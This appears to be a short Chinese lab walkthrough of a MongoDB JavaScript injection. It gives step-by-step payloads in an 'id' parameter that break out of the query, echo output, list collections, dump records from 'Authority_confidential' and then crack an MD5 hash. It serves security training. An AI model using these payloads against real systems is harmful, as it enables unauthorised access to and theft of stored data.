步骤一:找寻注入sql页面
步骤二:构造回显测试
传⼊的数据是$id。注意到可以通过闭合 “({‘” 来构造payload 因为返回的数据是$obj[‘retva
l’][‘title’]与$obj[‘retval’][‘content’],可以尝试return({title:’1’,content:’2’})来构造回显测试
?id=1'});return ({title:'1',content:'2
步骤三:查询当前数据库
?id=1'});return({title:tojson(db),content:'2
步骤四:数据库中所有集合名称的数组
?id=1'});return({title:tojson(db.getCollectionNames()),content:'2
步骤五:查询数据
?id=1'});return({title:tojson(db.Authority_confidential.find()[0]),content:'2
?id=1'});return({title:tojson(db.Authority_confidential.find()[1]),content:'2
步骤六:利用md5解密902621